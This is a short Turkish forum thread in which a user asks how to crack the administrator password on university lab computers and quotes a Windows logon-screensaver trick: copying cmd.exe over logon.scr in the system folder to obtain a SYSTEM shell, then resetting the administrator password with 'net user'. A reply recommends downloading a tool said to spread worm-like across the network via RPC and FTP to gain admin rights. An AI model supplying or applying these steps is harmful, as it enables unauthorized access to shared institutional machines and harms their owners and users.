Crack An Admin Pass

1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    zerocool_8
    zerocool_8's avatar
    Erkek
    Slm arkadaslar,üniversitede computer pools ta admin pass i kirmaya calistim,birkactane yöntem denedim ama olmadi.

Benim en cok güvendigim, buldugum asagidaki komutlardi ama onlarda ise yaramadi :((

If you can log in as an account , drop to DOS start -> run -> cmd, at the C: prompt type the following (assuming default install locations)

C:\> cd \winnt\system32
    C:\winnt\system32> copy logon.scr logon.scr.old
    C:\winnt\system32> del logon.scr
    C:\winnt\system32> copy cmd.exe logon.scr

Now log off the machine, logon.scr is the screen saver that will kick in after 15 minutes of not touching the keyboard/mouse at the logon screen. Wait 15-20 minutes and a DOS prompt with FULL SYSTEM rights will pop up, then just to
    C:\> net user administrator <newpassword>
    and then log in with the new account.

Acaba komutlarda mi bi hata vardi bilmiyorum.Bazi programlar buldum ama bilgisayarlar,yüklemeye izin vermiyo zaten.Ne yapabilirim bilmiyorum.Aranizda bundan anlayan varsa,ve yardim ederse sevinirim,Bye!!!

Love is a name Sex is a game Fuck the name Play the game
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    StanleyJopson
    StanleyJopson's avatar
    Erkek
    cok daha basit sekilde unniversitedekimakinalirin mna koyacak bir yazilim ;))
    universide dsin ve sana ozel user pass var ama belli yetkimi vermisler ama administrator catir catir tikmemi istiyon aha al ozaman
    http://emco.is/
    remote desktop dene seyi indir sonra acinac dok networku de ve bekle oha diyecegin bir yazilim salinda resmen worm matigi ile caliyor ;)
    rpc den paket gonderim ftp acip kendini kopyalatim run ettiriyor inamayacaksin belki ama dogru hadi kolay administrator tikmeler

Asla kimseye zeki gorunme hep salak rolu oyna.! :::::::my IQ 146 En sevdigim halimdir.:::::::
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    garga
    garga's avatar
    Erkek
    StanleyJopson bunu yazdı:
    -----------------------------
    cok daha basit sekilde unniversitedekimakinalirin mna koyacak bir yazilim ;))
    universide dsin ve sana ozel user pass var ama belli yetkimi vermisler ama administrator catir catir tikmemi istiyon aha al ozaman
    http://emco.is/
    remote desktop dene seyi indir sonra acinac dok networku de ve bekle oha diyecegin bir yazilim salinda resmen worm matigi ile caliyor ;)
    rpc den paket gonderim ftp acip kendini kopyalatim run ettiriyor inamayacaksin belki ama dogru hadi kolay administrator tikmeler
    -----------------------------

kafam karıştı ya, klavyenin 1-2 tuşu basmıyo galiba :)
    neyse sonunda anladım ne yazdığını siteye girdim ilginç şeyler var, saol...

anca gidersin...
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    zerocool_8
    zerocool_8's avatar
    Erkek
    Sagol Stanley

Love is a name Sex is a game Fuck the name Play the game
Toplam Hit: 2748 Toplam Mesaj: 4